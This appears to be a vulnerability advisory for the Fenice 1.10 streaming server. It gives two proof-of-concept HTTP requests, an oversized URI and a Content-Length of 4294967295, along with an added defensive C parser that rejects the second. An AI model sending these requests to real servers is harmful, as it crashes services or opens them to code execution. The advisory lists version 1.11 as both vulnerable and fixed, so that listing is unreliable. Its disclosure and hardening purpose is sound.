Luigi Auriemma <aluigi@autistici.org> discovered these vulnerabilities.

- Vulnerable

(LS)3 Fenice 1.10
(LS)3 Fenice 1.11

- Not vulnerable

(LS)3 Fenice 1.11

- Discussion

Fenice is prone to multiple remote vulnerabilities:

- A buffer-overflow vulnerability. The application fails to perform sufficient bounds checking of user-supplied data before copying it to an insufficiently sized memory buffer. This issue potentially allows remote attackers to execute arbitrary machine code in the context of the affected server process. Failed exploit attempts will likely crash the application, denying service to legitimate users.

- A denial-of-service vulnerability due to an integer-overflow flaw. This issue allows remote attackers to crash the affected application, denying service to legitimate users.

Fenice 1.10 is vulnerable to these issues; other versions may also be affected.

- Exploit

The following HTTP request is sufficient to demonstrate the buffer-overflow vulnerability:
GET /[approximately 320 'a's] HTTP/1.0

The following HTTP request is sufficient to demonstrate the denial-of-service vulnerability:
GET / HTTP/1.0
Content-Length: 4294967295
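
The second request shows the denial-of-service class from the defender's side: a Content-Length of 4294967295 is 0xFFFFFFFF, which a 32-bit length field cannot hold once anything is added to it. The following is an added example, not Fenice's code and not part of this advisory; it parses the header into a wide type, rejects negative, malformed and over-large values before any narrowing, and a second function shows what the naive 32-bit "length plus one" arithmetic does with the advisory's value. BODY_MAX, the result codes and the sample requests are constructed for the illustration; the page does not state where Fenice's own integer overflow sits.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <stdlib.h>
#include <errno.h>

/* Constructed upper bound for a request body in this illustration; the
   limit a real server should apply depends on what it serves. */
#define BODY_MAX 65536ULL

enum { CL_ABSENT = 0, CL_OK = 1, CL_INVALID = -1, CL_TOO_LARGE = -2 };

/*
 * Find the Content-Length header in a raw request and parse it into *len.
 * The value is read as unsigned long long and compared with BODY_MAX
 * before it is ever narrowed to a smaller type, so a header such as
 * "Content-Length: 4294967295" is refused up front instead of reaching
 * size arithmetic that can wrap.
 */
int parse_content_length(const char *request, size_t *len)
{
    const char *line = request;
    while (line && *line) {
        const char *eol = strstr(line, "\r\n");
        size_t n = eol ? (size_t)(eol - line) : strlen(line);
        if (n == 0)                       /* blank line: end of headers */
            break;
        if (n >= 15 && strncasecmp(line, "Content-Length:", 15) == 0) {
            const char *v = line + 15;
            char *end;
            unsigned long long val;
            while (*v == ' ' || *v == '\t') v++;
            if (*v < '0' || *v > '9')     /* rejects "-1", "+5", empty */
                return CL_INVALID;
            errno = 0;
            val = strtoull(v, &end, 10);
            if (errno == ERANGE)
                return CL_INVALID;
            while (end < line + n && (*end == ' ' || *end == '\t')) end++;
            if (end != line + n)          /* junk after the digits */
                return CL_INVALID;
            if (val > BODY_MAX)
                return CL_TOO_LARGE;
            if (len) *len = (size_t)val;
            return CL_OK;
        }
        line = eol ? eol + 2 : NULL;
    }
    return CL_ABSENT;
}

/*
 * The arithmetic a naive server might do after accepting the header as a
 * 32-bit value: body length plus one byte for a terminator. With the
 * 4294967295 from the advisory this wraps to 0, so a following allocation
 * would be far too small for the data it is later asked to hold.
 */
unsigned int naive_alloc_size(unsigned long long content_length)
{
    unsigned int narrowed = (unsigned int)content_length;   /* truncates */
    return narrowed + 1;                                     /* may wrap */
}

int main(void)
{
    /* constructed sample requests, modelled on the ones quoted above */
    const char *dos = "GET / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n";
    const char *ok  = "GET / HTTP/1.0\r\nContent-Length: 120\r\n\r\n";
    size_t n = 0;
    printf("DoS request -> %d (CL_TOO_LARGE is %d)\n",
           parse_content_length(dos, &n), CL_TOO_LARGE);
    printf("normal request -> %d, length %zu\n",
           parse_content_length(ok, &n), n);
    printf("naive 32-bit size for 4294967295 -> %u\n",
           naive_alloc_size(4294967295ULL));
    return 0;
}
```

A request-line length cap of the same kind (refuse the request before parse_url ever sees a URI longer than the buffers it fills) would have covered the overflow described earlier on this page; the check is cheap and belongs at the point where bytes leave the socket.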

The following exploit code is available:

- Solution

The vendor has released version 1.11 to address this issue.


(LS)3 Fenice 1.10
